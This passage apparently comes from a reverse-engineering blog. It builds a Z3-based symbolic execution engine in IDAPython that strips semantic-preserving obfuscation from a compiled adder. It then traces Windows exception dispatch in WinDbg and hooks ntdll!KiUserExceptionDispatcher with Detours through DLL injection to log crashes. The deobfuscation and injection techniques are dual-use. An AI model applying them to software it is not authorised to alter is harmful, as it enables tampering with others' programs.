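        a = (a ^ b) & MASK
        b = carry & MASK
    return a

def equivalent(f, g):
    """True if f and g agree on every pair of BITS-bit inputs."""
    return all(f(a, b) == g(a, b)
               for a, b in product(range(1 << BITS), repeat=2))

is_add = equivalent(bitwise_add, lambda a, b: (a + b) & MASK)
is_xor = equivalent(bitwise_add, lambda a, b: a ^ b)
print(is_add, is_xor)
# prints: True False
```

Enumerating 2^16 input pairs is instant, but 2^64 pairs is out of reach, which is exactly why asking a solver whether the negation of the equality is unsatisfiable is the right tool at 32 bits.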

The ugly trick I came up with is just to use Z3Py's prove function, to try to prove that the equation is in fact an addition and if this is the case it returns the simplified equation. Again, if someone manages to simplify the previous equation without that type of trick I'm really interested!

def _simplify_additions(self, eq):
    '''The idea in this function is to help Z3 to simplify our big bitvec-arithmetic
    expression. It's simple, in eq we have a big expression with two symbolic variables (arg0 & arg1)
    and a lot of bitvec arithmetic. Somehow, the simplify function is not clever enough to reduce the
    equation.

    The idea here is to use the prove function in order to see if we can simplify an equation by an addition of the
    symbolic variables.'''
    # The two expressions are equivalent ; we got a simplification!
    if prove(Sum(self.sym_variables) == eq):
        return Sum(self.sym_variables)

    return eq

def get_reg_equation_simplified(self, reg):
    eq = self.get_reg_equation(reg)
    eq = simplify(self._simplify_additions(eq))
    return eq

And now if you relaunch the script you will get:

Launching the engine..
Trying to read a non-initialized area, we got a new symbolic variable: arg0
Trying to read a non-initialized area, we got a new symbolic variable: arg1
Done, retrieving the equation in EAX, and simplifying..
EAX=arg0 + arg1

We just successfully simplified two thousand assembly instructions into a simple addition, wonderful!
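The same guess-then-check idea extends to more than one candidate. The sketch below is a variation of mine, not something the engine does: it filters a hypothetical list of candidate expressions with random 32-bit samples. Random testing can only rule candidates out, so a surviving guess would still have to go through prove before being trusted.

```python
import random

MASK = 0xffffffff

# Hypothetical candidate list ; extend it with whatever shapes you expect.
CANDIDATES = [
    ('arg0 + arg1', lambda a, b: (a + b) & MASK),
    ('arg0 - arg1', lambda a, b: (a - b) & MASK),
    ('arg0 ^ arg1', lambda a, b: a ^ b),
    ('arg0 & arg1', lambda a, b: a & b),
    ('arg0 | arg1', lambda a, b: a | b),
]

def guess(f, trials=1000, seed=0):
    """Return the first candidate agreeing with f on every random sample, else None."""
    rng = random.Random(seed)
    samples = [(rng.getrandbits(32), rng.getrandbits(32)) for _ in range(trials)]
    for name, g in CANDIDATES:
        if all(f(a, b) == g(a, b) for a, b in samples):
            return name
    return None

def obfuscated(a, b):
    # (a ^ b) + 2 * (a & b) is a well-known identity for a + b.
    return ((a ^ b) + 2 * (a & b)) & MASK

print(guess(obfuscated))
# prints: arg0 + arg1
```

A cheap filter like this narrows down what to hand to the solver, so the expensive proof only runs on a guess that already looks right.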

Symbolic execution VS Kryptonite

OK, now that we have a working engine able to break a small program (~two thousand instructions), let's see if we can do the same with a kryptonized binary. Let's take a simple addition like in the previous parts:

#include <stdio.h>
#include <stdlib.h>

unsigned int add(unsigned int a, unsigned int b)
{
    return a + b;
}

int main(int argc, char* argv[])
{
    if(argc != 3)
        return 0;

    printf("Result: %u\n", add(atoll(argv[1]), atoll(argv[2])));
    return 1;
}

Now, time for a kryptonization:

$ wget https://raw.github.com/0vercl0k/stuffz/master/llvm-funz/kryptonite/llvm-functionpass-kryptonite-obfuscater.cpp
$ clang++ llvm-functionpass-kryptonite-obfuscater.cpp `llvm-config --cxxflags --ldflags --libs core` -shared -o llvm-functionpass-kryptonite-obfuscater.so
$ clang -S -emit-llvm add.c -o add.ll
$ opt -S -load ~/dev/llvm-functionpass-kryptonite-obfuscater.so -kryptonite -heavy-add-obfu add.ll -o add.opti.ll && mv add.opti.ll add.ll
$ opt -S -load ~/dev/llvm-functionpass-kryptonite-obfuscater.so -kryptonite -heavy-add-obfu add.ll -o add.opti.ll && mv add.opti.ll add.ll
$ llc -O0 -filetype=obj -march=x86 add.ll -o add.o
$ clang -static add.o -o kryptonite-add
$ strip --strip-all ./kryptonite-add

At this point we end up with this binary: kryptonite-add. The target routine for our study starts at 0x804823C and ends at 0x08072284: more than 40 thousand assembly instructions, kind of big, right?

Here is our final IDAPython script after some minor adjustments (added one or two more instructions):

class EquationId(object):
    def __init__(self, id_):
        self.id = id_

    def __repr__(self):
        return 'EID:%d' % self.id

class Disassembler(object):
    '''A simple class to decode easily instruction in IDA'''
    def __init__(self, start, end):
        self.start = start
        self.end = end
        self.eip = start

    def _decode_instr(self):
        '''Returns mnemonic, dst, src'''
        mnem = GetMnem(self.eip)
        x = []
        for i in range(2):
            ty = GetOpType(self.eip, i)
            # cst
            if 5 <= ty <= 7:
                x.append(GetOperandValue(self.eip, i))
            else:
                x.append(GetOpnd(self.eip, i))

        return [mnem] + x

    def get_next_instruction(self):
        '''This is a convenient generator: you can iterate through
        each instruction easily'''
        while self.eip != self.end:
            yield self._decode_instr()
            self.eip += ItemSize(self.eip)

class SymbolicExecutionEngine(object):
    '''The symbolic execution engine is the class that will
    handle the symbolic execution. It will keep a track of the 
    different equations encountered, and the CPU context at each point of the program.

    The symbolic variables have to be found by the user (or using data-tainting). This is not
    the purpose of this class.

    We are lucky, we only need to handle those operations & encodings:
        . mov:
            . mov reg32, reg32
            . mov reg32, [mem]
            . mov [mem], reg32
            . mov reg32, cst
        . shr:
            . shr reg32, cst
        . shl:
            . shl reg32, cst
        . and:
            . and reg32, cst
            . and reg32, reg32
        . xor:
            . xor reg32, cst
        . or:
            . or reg32, reg32
        . add:
            . add reg32, reg32
            . add reg32, cst

    We also don't care about:
        . EFLAGS
        . branches
        . smaller registers (16/8 bits)
    Long story short: it's perfect ; that environment makes it really easy to play with symbolic execution.'''
    def __init__(self, start, end):
        # This is the CPU context at each time
        # The values of the registers are indices into the equations dictionary
        self.ctx = {
            'eax' : None,
            'ebx' : None,
            'ecx' : None,
            'edx' : None,
            'esi' : None,
            'edi' : None,
            'ebp' : None,
            'esp' : None,
            'eip' : None
        }

        # The address where the symbolic execution will start
        self.start = start

        # The address where the symbolic execution will stop
        self.end = end

        # Our disassembler
        self.disass = Disassembler(start, end)

        # This is the memory that can be used by the instructions to save temporary values/results
        self.mem = {}

        # Each equation must have a unique id
        self.idx = 0

        # The symbolic variables will be stored there
        self.sym_variables = []

        # Each equation will be stored here
        self.equations = {}

        # Number of instructions emulated
        self.ninstrs = 0

    def _check_if_reg32(self, r):
        '''XXX: make a decorator?'''
        return r.lower() in self.ctx

    def _push_equation(self, e):
        idx = EquationId(self.idx)
        self.equations[idx] = e
        self.idx += 1
        return idx

    def set_reg_with_equation(self, r, e):
        if self._check_if_reg32(r) == False:
            return

        self.ctx[r] = self._push_equation(e)

    def get_reg_equation(self, r):
        if self._check_if_reg32(r) == False:
            return

        if isinstance(self.ctx[r], EquationId):
            return self.equations[self.ctx[r]]
        else:
            return self.ctx[r]

    def run(self):
        '''Run the engine from the start address to the end address'''
        for mnemonic, dst, src in self.disass.get_next_instruction():
            if (self.ninstrs % 5000) == 0 and self.ninstrs > 0:
                print '%d instructions, %d equations so far...' % (self.ninstrs, len(self.equations))

            if mnemonic == 'mov':
                # mov reg32, imm32
                if dst in self.ctx and isinstance(src, (int, long)):
                    self.ctx[dst] = src
                # mov reg32, reg32
                elif src in self.ctx and dst in self.ctx:
                    self.ctx[dst] = self.ctx[src]
                # mov reg32, [mem]
                elif (src.find('var_') != -1 or src.find('arg') != -1) and dst in self.ctx:
                    if src not in self.mem:
                        # A non-initialized location is trying to be read, we got a symbolic variable!
                        sym = BitVec('arg%d' % len(self.sym_variables), 32)
                        self.sym_variables.append(sym)
                        print 'Trying to read a non-initialized area, we got a new symbolic variable: %s' % sym
                        self.mem[src] = self._push_equation(sym)

                    self.ctx[dst] = self.mem[src]
                # mov [mem], reg32
                elif dst.find('var_') != -1 and src in self.ctx:
                    self.mem[dst] = self.ctx[src]
                else:
                    raise Exception('This encoding of "mov" is not handled.')
            elif mnemonic == 'shr':
                # shr reg32, cst
                if dst in self.ctx and isinstance(src, (int, long)):
                    self.set_reg_with_equation(dst, self.get_reg_equation(dst) >> src)
                else:
                    raise Exception('This encoding of "shr" is not handled.')
            elif mnemonic == 'shl':
                # shl reg32, cst
                if dst in self.ctx and isinstance(src, (int, long)):
                    self.set_reg_with_equation(dst, self.get_reg_equation(dst) << src)
                else:
                    raise Exception('This encoding of "shl" is not handled.')
            elif mnemonic == 'and':
                # and reg32, cst
                if isinstance(src, (int, long)):
                    x = src
                # and reg32, reg32
                elif src in self.ctx:
                    x = self.get_reg_equation(src)
                else:
                    raise Exception('This encoding of "and" is not handled.')

                self.set_reg_with_equation(dst, self.get_reg_equation(dst) & x)
            elif mnemonic == 'xor':
                # xor reg32, cst
                if dst in self.ctx and isinstance(src, (int, long)):
                    if self.ctx[dst] not in self.equations:
                        self.ctx[dst] ^= src
                    else:
                        self.set_reg_with_equation(dst, self.get_reg_equation(dst) ^ src)
                else:
                    raise Exception('This encoding of "xor" is not handled.')
            elif mnemonic == 'or':
                # or reg32, reg32
                if dst in self.ctx and src in self.ctx:
                    self.set_reg_with_equation(dst, self.get_reg_equation(dst) | self.get_reg_equation(src))
                else:
                    raise Exception('This encoding of "or" is not handled.')
            elif mnemonic == 'add':
                # add reg32, reg32
                if dst in self.ctx and src in self.ctx:
                    self.set_reg_with_equation(dst, self.get_reg_equation(dst) + self.get_reg_equation(src))
                # add reg32, cst
                elif dst in self.ctx and isinstance(src, (int, long)):
                    self.set_reg_with_equation(dst, self.get_reg_equation(dst) + src)
                else:
                    raise Exception('This encoding of "add" is not handled.')
            else:
                print mnemonic, dst, src
                raise Exception('This instruction is not handled.')

            self.ninstrs += 1

    def _simplify_additions(self, eq):
        '''The idea in this function is to help Z3 to simplify our big bitvec-arithmetic
        expression. It's simple, in eq we have a big expression with two symbolic variables (arg0 & arg1)
        and a lot of bitvec arithmetic. Somehow, the simplify function is not clever enough to reduce the
        equation.

        The idea here is to use the prove function in order to see if we can simplify an equation by an addition of the
        symbolic variables.'''
        # The two expressions are equivalent ; we got a simplification!
        if prove_(Sum(self.sym_variables) == eq):
            return Sum(self.sym_variables)

        return eq

    def get_reg_equation_simplified(self, reg):
        eq = self.get_reg_equation(reg)
        eq = simplify(self._simplify_additions(eq))
        return eq


def main():
    '''Here we will try to attack the semantic-preserving obfuscations
    I talked about in "Obfuscation of steel: meet my Kryptonite." : http://0vercl0k.tuxfamily.org/bl0g/?p=260.

    The idea is to defeat those obfuscations using a tiny symbolic execution engine.'''
    # sym = SymbolicExecutionEngine(0x804845A, 0x0804A17C) # for simple adder
    sym = SymbolicExecutionEngine(0x804823C, 0x08072284) # adder kryptonized
    print 'Launching the engine..'
    sym.run()
    print 'Done. %d equations built, %d assembly lines emulated, %d virtual memory cells used' % (len(sym.equations), sym.ninstrs, len(sym.mem))
    print 'CPU state at the end:'
    print sym.ctx
    print 'Retrieving and simplifying the EAX register..'
    eax = sym.get_reg_equation_simplified('eax')
    print 'EAX=%r' % eax
    return 1

if __name__ == '__main__':
    main()

And here is the final output:

Launching the engine..
Trying to read a non-initialized area, we got a new symbolic variable: arg0
Trying to read a non-initialized area, we got a new symbolic variable: arg1
5000 instructions, 2263 equations so far...
10000 instructions, 4832 equations so far...
15000 instructions, 7228 equations so far...
20000 instructions, 9766 equations so far...
25000 instructions, 12212 equations so far...
30000 instructions, 14762 equations so far...
35000 instructions, 17255 equations so far...
40000 instructions, 19801 equations so far...
Done. 19857 equations built, 40130 assembly lines emulated, 5970 virtual memory cells used
CPU state at the end:
{'eax': EID:19856, 'ebp': None, 'eip': None, 'esp': None, 'edx': EID:19825, 'edi': EID:19796, 'ebx': EID:19797, 'esi': EID:19823, 'ecx': EID:19856}
Retrieving and simplifying the EAX register..
EAX=arg0 + arg1
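
The prove-based trick in _simplify_additions asks Z3 for a real proof of equivalence. A much weaker, dependency-free sanity check is random testing: evaluate both expressions on many random 32-bit inputs and compare the results. The sketch below is not part of the engine above. obfuscated_add is a hypothetical stand-in (a classic mixed boolean-arithmetic rewrite of an addition) for the huge expression the engine recovers, and agreement on random inputs is only evidence, not a proof.

```python
import random

MASK32 = 0xFFFFFFFF

def obfuscated_add(a, b):
    # Hypothetical obfuscated form: a + b == (a ^ b) + 2 * (a & b) on bit-vectors.
    return ((a ^ b) + 2 * (a & b)) & MASK32

def plain_add(a, b):
    # The candidate simplification we want to check against.
    return (a + b) & MASK32

def probably_equivalent(f, g, trials=10000, seed=0):
    """Return True if f and g agree on `trials` random pairs of 32-bit inputs."""
    rng = random.Random(seed)
    for _ in range(trials):
        a = rng.getrandbits(32)
        b = rng.getrandbits(32)
        if f(a, b) != g(a, b):
            return False
    return True

if __name__ == '__main__':
    print(probably_equivalent(obfuscated_add, plain_add))
```

A check like this is handy for quickly rejecting a wrong guess before paying for a solver call; the solver is still what gives the actual guarantee.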

Conclusion

I hope you enjoyed this little introduction to symbolic execution, and how valuable it can be for removing some semantic-preserving obfuscations. We have also seen that this PoC is not really elaborate: it doesn't handle loops or branches, doesn't care about EFLAGS, etc.; but it was enough to break our two examples. I hope you also enjoyed the examples used to showcase our tiny symbolic execution engine.

If you want to go further with symbolic execution, here is a list of nice articles:

PS: By the way, for those who like weird machines, I've managed to code a MOV/JMP Turing machine based on "mov is Turing-complete" here: fun_with_mov_turing_completeness.cpp!

Having a look at the Windows' User/Kernel exceptions dispatcher

Introduction

The purpose of this little post is to create a piece of code able to monitor exceptions raised in a process (a bit like gynvael's ExcpHook but in userland), and to generate a report with information related to the exception. The other purpose is to have a look at the internals of course.

--Exception detected--
ExceptionRecord: 0x0028fa2c Context: 0x0028fa7c
Image Path: D:\Codes\The Sentinel\tests\divzero.exe
Command Line: ..\tests\divzero.exe divzero.exe
PID: 0x00000aac
Exception Code: 0xc0000094 (EXCEPTION_INT_DIVIDE_BY_ZERO)
Exception Address: 0x00401359
EAX: 0x0000000a EDX: 0x00000000 ECX: 0x00000001 EBX: 0x7ffde000
ESI: 0x00000000 EDI: 0x00000000 ESP: 0x0028fee0 EBP: 0x0028ff18
EIP: 0x00401359
EFLAGS: 0x00010246

Stack:
0x767bc265 0x54f3620f 0xfffffffe 0x767a0f5a 
0x767ffc59 0x004018b0 0x0028ff90 0x00000000

Disassembly:
00401359 (04) f77c241c                 IDIV DWORD [ESP+0x1c]
0040135d (04) 89442404                 MOV [ESP+0x4], EAX
00401361 (07) c7042424304000           MOV DWORD [ESP], 0x403024
00401368 (05) e833080000               CALL 0x401ba0
0040136d (05) b800000000               MOV EAX, 0x0

That's why I divided this post in two big parts:

  • the first one will talk about the Windows internals background required to understand how things work under the hood,
  • the last one will talk about Detours and how to hook ntdll!KiUserExceptionDispatcher for our purpose.

Basically, the Detours library gives programmers a set of APIs to easily hook procedures. It also has clean and readable documentation, so you should use it! It is usually used for this kind of thing:

  • Hot-patching bugs (no need to reboot),
  • Tracing API calls (API Monitor like),
  • Monitoring (a bit like our example),
  • Pseudo-sandboxing (prevent API calls),
  • etc.

Lights on ntdll!KiUserExceptionDispatcher

The purpose of this part is to make sure we understand how exceptions are given back to userland in order to be handled (or not) by the [SEH](http://msdn.microsoft.com/en-us/library/windows/desktop/ms680657(v=vs.85).aspx)/[UEF](http://msdn.microsoft.com/en-us/library/windows/desktop/ms681401(v=vs.85).aspx) mechanisms; I'm going to focus on Windows 7 x86 because that's the OS I run in my VM. The other objective of this part is to give you the big picture: we are not going into too many details, just enough to write a working exception sentinel PoC later.

nt!KiTrap*

When your userland application does something wrong an exception is raised by your CPU: let's say you are trying to do a division by zero (nt!KiTrap00 will handle that case), or you are trying to fetch a memory page that doesn't exist (nt!KiTrap0E).

kd> !idt -a

Dumping IDT: 80b95400

00:   8464d200 nt!KiTrap00
01:   8464d390 nt!KiTrap01
02:   Task Selector = 0x0058
03:   8464d800 nt!KiTrap03
04:   8464d988 nt!KiTrap04
05:   8464dae8 nt!KiTrap05
06:   8464dc5c nt!KiTrap06
07:   8464e258 nt!KiTrap07
08:   Task Selector = 0x0050
09:   8464e6b8 nt!KiTrap09
0a:   8464e7dc nt!KiTrap0A
0b:   8464e91c nt!KiTrap0B
0c:   8464eb7c nt!KiTrap0C
0d:   8464ee6c nt!KiTrap0D
0e:   8464f51c nt!KiTrap0E
0f:   8464f8d0 nt!KiTrap0F
10:   8464f9f4 nt!KiTrap10
11:   8464fb34 nt!KiTrap11
[...]

I'm sure you already know that, but on x86 Intel processors there is a table called the IDT that stores the different routines that will handle the exceptions. The virtual address of that table is stored in a special x86 register called IDTR, and that register is accessible only by using the instructions sidt (Stores Interrupt Descriptor Table register) and lidt (Loads Interrupt Descriptor Table register).

Basically there are two important things in an IDT entry: the address of the ISR, and the segment selector (remember it's essentially an index into the GDT) the CPU should use.

kd> !pcr
KPCR for Processor 0 at 84732c00:
    [...]
                    IDT: 80b95400
                    GDT: 80b95000

kd> dt nt!_KIDTENTRY 80b95400
    +0x000 Offset           : 0xd200
    +0x002 Selector         : 8
    +0x004 Access           : 0x8e00
    +0x006 ExtendedOffset   : 0x8464

kd> ln (0x8464 << 10) + (0xd200)
Exact matches:
    nt!KiTrap00 (<no parameter info>)
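
To make the layout of that entry explicit, here is a minimal Python sketch that decodes an 8-byte 32-bit gate descriptor using the four fields of the nt!_KIDTENTRY dump above. The function name decode_idt_gate and the dictionary keys are made up for the illustration. Note that the `<< 10` in the ln command is evaluated in hexadecimal (assuming WinDbg's default radix), so it is a shift by 16 bits.

```python
import struct

def decode_idt_gate(raw):
    """Decode an 8-byte x86 (32-bit) IDT gate descriptor."""
    # Same field order as nt!_KIDTENTRY: Offset, Selector, Access, ExtendedOffset.
    offset_low, selector, access, offset_high = struct.unpack('<HHHH', raw)
    flags = access >> 8  # the upper byte of Access holds P, DPL and the gate type
    return {
        'handler': (offset_high << 16) | offset_low,
        'selector': selector,
        'present': bool(flags & 0x80),
        'dpl': (flags >> 5) & 0x3,
        'gate_type': flags & 0xF,  # 0xE is a 32-bit interrupt gate
    }

# Values copied from the dt nt!_KIDTENTRY 80b95400 output.
entry = struct.pack('<HHHH', 0xd200, 0x0008, 0x8e00, 0x8464)
gate = decode_idt_gate(entry)

if __name__ == '__main__':
    print('handler=%#x selector=%#x dpl=%d' % (gate['handler'], gate['selector'], gate['dpl']))
```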

kd> !@display_gdt 80b95000

#################################
# Global Descriptor Table (GDT) #
#################################

Processor 00
Base : 80B95000    Limit : 03FF

Off.  Sel.  Type    Sel.:Base  Limit   Present  DPL  AVL  Informations
----  ----  ------  ---------  ------- -------  ---  ---  ------------
[...]
0008  0008  Code32  00000000  FFFFFFFF  YES     0    0    Execute/Read, accessed  (Ring 0)CS=0008
[...]

The entry just above tells us that for the processor 0, if a division-by-zero exception is raised the kernel mode routine nt!KiTrap00 will be called with a flat-model code32 ring0 segment (cf GDT dump).
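
Strictly speaking a segment selector is a bit more than an index: the low two bits hold the requested privilege level (RPL), bit 2 selects the GDT or the LDT, and the remaining bits are the table index. The sketch below (decode_selector is a hypothetical helper name) decodes the selector 0x08 from the IDT entry, and also 0x1b, the user-mode CS value that shows up in trap frames.

```python
def decode_selector(sel):
    """Split a 16-bit x86 segment selector into its three fields."""
    return {
        'index': sel >> 3,       # descriptor index in the GDT/LDT
        'ti': (sel >> 2) & 1,    # table indicator: 0 = GDT, 1 = LDT
        'rpl': sel & 3,          # requested privilege level
    }

if __name__ == '__main__':
    for sel in (0x08, 0x1b, 0x23):
        print(hex(sel), decode_selector(sel))
```

The byte offset of the descriptor in the GDT is simply index * 8, which is why selector 0x08 matches the row at offset 0008 in the GDT dump.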

Once the CPU is in nt!KiTrap00's code it does a lot of things (the same goes for all the other nt!KiTrap routines), but once they have created the nt!_KTRAP_FRAME structure associated with the fault they all (more or less) end up in the kernel mode exceptions dispatcher: nt!KiDispatchException (remember gynvael's tool? He was hooking that function!).

nt!KiExceptionDispatch graph from ReactOS

Now, you may already have asked yourself how the kernel reaches back to userland in order to process the exception via the SEH mechanism, for example?

That's kind of simple actually. The trick used by the Windows kernel is to check where the exception took place: if it's from user mode, the kernel mode exceptions dispatcher sets the Eip field of the trap frame structure (passed as an argument) to the value stored in the symbol nt!KeUserExceptionDispatcher. Then, nt!Kei386EoiHelper will use that same trap frame to resume the execution (in our case at the address stored in nt!KeUserExceptionDispatcher).

But guess what? That symbol holds the address of ntdll!KiUserExceptionDispatcher, so it makes total sense!

kd> dps nt!KeUserExceptionDispatcher L1
847a49a0  77476448 ntdll!KiUserExceptionDispatcher

If like me you like illustrations, I've made a WinDbg session where I am going to show what we just talked about. First, let's trigger our division-by-zero exception:

kd> bp nt!KiTrap00

kd> g
Breakpoint 0 hit
nt!KiTrap00:
8464c200 6a00            push    0

kd> k
ChildEBP RetAddr  
8ec9bd98 01141269 nt!KiTrap00
8ec9bd9c 00000000 divzero+0x1269

kd> u divzero+0x1269 l1
divzero+0x1269:
01141269 f7f0            div     eax,eax

Now let's go a bit further in the ISR, and more precisely when the nt!_KTRAP_FRAME is built:

kd> bp nt!KiTrap00+0x36

kd> g
Breakpoint 1 hit
nt!KiTrap00+0x36:
8464c236 8bec            mov     ebp,esp

kd> dt nt!_KTRAP_FRAME @esp
    +0x000 DbgEbp           : 0x1141267
    +0x004 DbgEip           : 0x1141267
    +0x008 DbgArgMark       : 0
    +0x00c DbgArgPointer    : 0
    +0x010 TempSegCs        : 0
    +0x012 Logging          : 0 ''
    +0x013 Reserved         : 0 ''
    +0x014 TempEsp          : 0
    +0x018 Dr0              : 0
    +0x01c Dr1              : 0
    +0x020 Dr2              : 0
    +0x024 Dr3              : 0x23
    +0x028 Dr6              : 0x23
    +0x02c Dr7              : 0x1141267
    +0x030 SegGs            : 0
    +0x034 SegEs            : 0x23
    +0x038 SegDs            : 0x23
    +0x03c Edx              : 0x1141267
    +0x040 Ecx              : 0
    +0x044 Eax              : 0
    +0x048 PreviousPreviousMode : 0
    +0x04c ExceptionList    : 0xffffffff _EXCEPTION_REGISTRATION_RECORD
    +0x050 SegFs            : 0x270030
    +0x054 Edi              : 0
    +0x058 Esi              : 0
    +0x05c Ebx              : 0x7ffd3000
    +0x060 Ebp              : 0x27fd58
    +0x064 ErrCode          : 0
    +0x068 Eip              : 0x1141269
    +0x06c SegCs            : 0x1b
    +0x070 EFlags           : 0x10246
    +0x074 HardwareEsp      : 0x27fd50
    +0x078 HardwareSegSs    : 0x23
    +0x07c V86Es            : 0
    +0x080 V86Ds            : 0
    +0x084 V86Fs            : 0
    +0x088 V86Gs            : 0

kd> .trap @esp
ErrCode = 00000000
eax=00000000 ebx=7ffd3000 ecx=00000000 edx=01141267 esi=00000000 edi=00000000
eip=01141269 esp=0027fd50 ebp=0027fd58 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0030  gs=0000             efl=00010246
divzero+0x1269:
001b:01141269 f7f0            div     eax,eax

kd> .trap
Resetting default scope
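
As a side note, the EFlags value stored in the trap frame (0x10246) can be decoded by hand to cross-check the "ei pl zr na pe nc" summary printed by .trap. The following is a small Python sketch; the table only lists the architectural flag bits that matter here and decode_eflags is a hypothetical helper name.

```python
# Bit positions of the most common EFLAGS bits (Intel SDM numbering).
EFLAGS_BITS = {
    0: 'CF', 2: 'PF', 4: 'AF', 6: 'ZF', 7: 'SF',
    8: 'TF', 9: 'IF', 10: 'DF', 11: 'OF', 16: 'RF', 17: 'VM',
}

def decode_eflags(value):
    """Return the names of the flags set in an EFLAGS value, lowest bit first."""
    return [name for bit, name in sorted(EFLAGS_BITS.items()) if value & (1 << bit)]

if __name__ == '__main__':
    print(decode_eflags(0x10246))
```

For 0x10246 this gives PF, ZF, IF and RF: the zero and parity flags match "zr" and "pe", and IF matches "ei" (interrupts enabled).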

The idea now is to track the modification of the nt!_KTRAP_FRAME.Eip field as we discussed earlier, via a hardware breakpoint (BTW, don't try to put a breakpoint directly on nt!KiDispatchException with VMware, it just blows up my guest virtual machine):

kd> ba w4 esp+68

kd> g
Breakpoint 2 hit
nt!KiDispatchException+0x3d6:
846c559e c745fcfeffffff  mov     dword ptr [ebp-4],0FFFFFFFEh

kd> dt nt!_KTRAP_FRAME Eip @esi
    +0x068 Eip : 0x77b36448

kd> ln 0x77b36448
Exact matches:
    ntdll!KiUserExceptionDispatcher (<no parameter info>)

OK, so here we can clearly see the trap frame has been modified (keep in mind WinDbg gives you control after the actual write). That basically means that when the kernel resumes the execution via nt!KiExceptionExit (or nt!Kei386EoiHelper, two symbols for the same address) the CPU will directly execute the user mode exceptions dispatcher.

Great, I think we now have enough understanding to move on to the second part of the article.

Serial Detourer

In this part we are going to talk about Detours, what its API looks like and how you can use it to build a userland exceptions sentinel without too many lines of code. Here is the list of the features we want:

  • To hook ntdll!KiUserExceptionDispatcher: we will use Detours for that,
  • To generate a tiny readable exception report: for the disassembly part we will use Distorm (yet another cool and easy-to-use library),
  • To focus on the x86 architecture: because unfortunately the Express version of Detours doesn't work for x86_64.

Detours is going to modify the first bytes of the API you want to hook in order to redirect its execution in your piece of code: it's called an inline-hook.
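
To give an idea of what such a patch looks like at the byte level, here is a minimal Python sketch that builds the classic 5-byte x86 `jmp rel32` used by inline hooks. It only shows the encoding: Detours itself does more (it builds a trampoline with the overwritten instructions, respects instruction boundaries, and so on), and the helper names and addresses below are made up for the illustration.

```python
import struct

JMP_REL32_SIZE = 5  # one opcode byte (0xE9) + a 32-bit displacement

def make_jmp_rel32(src, dst):
    """Encode `jmp dst` as it would be written at address `src`."""
    # The displacement is relative to the address of the *next* instruction.
    rel = (dst - (src + JMP_REL32_SIZE)) & 0xFFFFFFFF
    return b'\xe9' + struct.pack('<I', rel)

def jmp_target(src, patch):
    """Recover the destination of a jmp rel32 located at `src`."""
    (rel,) = struct.unpack('<i', patch[1:5])
    return (src + JMP_REL32_SIZE + rel) & 0xFFFFFFFF

if __name__ == '__main__':
    patch = make_jmp_rel32(0x1000, 0x2000)
    print(patch.hex(), hex(jmp_target(0x1000, patch)))
```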

detours.png

Detours can work in two modes:

  • A first mode where you don't touch the binary you're going to hook: you need a DLL module that you inject into your binary's memory. Then, Detours modifies in memory the code of the APIs you hook. That's what we are going to use.
  • A second mode where you modify the binary file itself, more precisely the IAT. In that mode, you won't need a DLL injector. If you are interested in the details of those tricks, they are described in the Detours.chm file in the installation directory, read it!

So our sentinel will be divided in two main parts:

  • A program that will start the target binary and inject our DLL module (that's where all the important things are),
  • The sentinel DLL module that will hook the userland exceptions dispatcher and write the exception report.

The first one is really easy to implement using DetourCreateProcessWithDll: it's going to create the process and inject the DLL we want.

Usage: ./ProcessSpawner <full path dll> <path executable> <excutable name> [args..]

To successfully hook a function you have to know its address of course, and you have to implement the hook function. Then, you have to call DetourTransactionBegin, DetourUpdateThread, DetourAttach, DetourTransactionCommit and you're done. Wonderful, isn't it?

The only tricky thing, in our case, is that we want to hook ntdll!KiUserExceptionDispatcher, and that function has its own custom calling convention. Fortunately for us, in the samples directory of Detours you can find how you are supposed to deal with that specific case:

VOID __declspec(naked) NTAPI KiUserExceptionDispatcher(PEXCEPTION_RECORD ExceptionRecord, PCONTEXT Context)
{
    /* Taken from the Excep's detours sample */
    __asm
    {
        xor     eax, eax                ; // Create fake return address on stack.
        push    eax                     ; // (Generally, we are called by the kernel.)

        push    ebp                     ; // Prolog
        mov     ebp, esp                ;
        sub     esp, __LOCAL_SIZE       ;
    }

    EnterCriticalSection(&critical_section);
    log_exception(ExceptionRecord, Context);
    LeaveCriticalSection(&critical_section);

    __asm
    {
        mov     ebx, ExceptionRecord    ;
        mov     ecx, Context            ;
        push    ecx                     ;
        push    ebx                     ;
        mov     eax, [TrueKiUserExceptionDispatcher];
        jmp     eax                     ;
        //
        // The above code should never return.
        //
        int     3                       ; // Break!
        mov     esp, ebp                ; // Epilog
        pop     ebp                     ;
        ret                             ;
    }
}

Here is what ntdll!KiUserExceptionDispatcher looks like in memory after the hook:

hook.png

Disassembling some instructions pointed to by the CONTEXT.Eip field is also really straightforward to do with distorm_decode:

if(IsBadReadPtr((const void*)Context->Eip, SIZE_BIGGEST_X86_INSTR * MAX_INSTRUCTIONS) == 0)
{
    _DecodeResult res;
    _OffsetType offset = Context->Eip;
    _DecodedInst decodedInstructions[MAX_INSTRUCTIONS] = {0};
    unsigned int decodedInstructionsCount = 0;

    res = distorm_decode(
        offset,
        (const unsigned char*)Context->Eip,
        MAX_INSTRUCTIONS * SIZE_BIGGEST_X86_INSTR,
        Decode32Bits,
        decodedInstructions,
        MAX_INSTRUCTIONS,
        &decodedInstructionsCount
    );

    if(res == DECRES_SUCCESS || res == DECRES_MEMORYERR)
    {
        fprintf(f, "\nDisassembly:\n");
        for(unsigned int i = 0; i < decodedInstructionsCount; ++i)
        {
            fprintf(
                f,
                "%.8I64x (%.2d) %-24s %s%s%s\n",
                decodedInstructions[i].offset,
                decodedInstructions[i].size,
                (char*)decodedInstructions[i].instructionHex.p,
                (char*)decodedInstructions[i].mnemonic.p,
                decodedInstructions[i].operands.length != 0 ? " " : "",
                (char*)decodedInstructions[i].operands.p
            );
        }
    }
}

So the prototype works pretty well like that.

D:\Codes\The Sentinel\Release>ProcessSpawner.exe "D:\Codes\The Sentinel\Release\ExceptionMonitorDll.dll" ..\tests\divzero.exe divzero.exe
D:\Codes\The Sentinel\Release>ls -l D:\Crashs\divzero.exe
total 4
-rw-rw-rw-  1 0vercl0k 0 863 2013-10-16 22:58 exceptionaddress_401359pid_2732tick_258597468timestamp_1381957116.txt

But once, I encountered a behavior that I hadn't planned for: there was a stack corruption in a stack frame protected by the /GS cookie. If the cookie has somehow been overwritten, the program calls __report_gsfailure (sometimes the implementation is directly inlined, thus you can find the definition of the function in your binary) in order to kill the program because the stack frame is broken. Long story short, I was also hooking kernel32!UnhandledExceptionFilter to not miss that kind of exception, but I noticed while writing this post that it doesn't work anymore. We are going to see why in the next part.

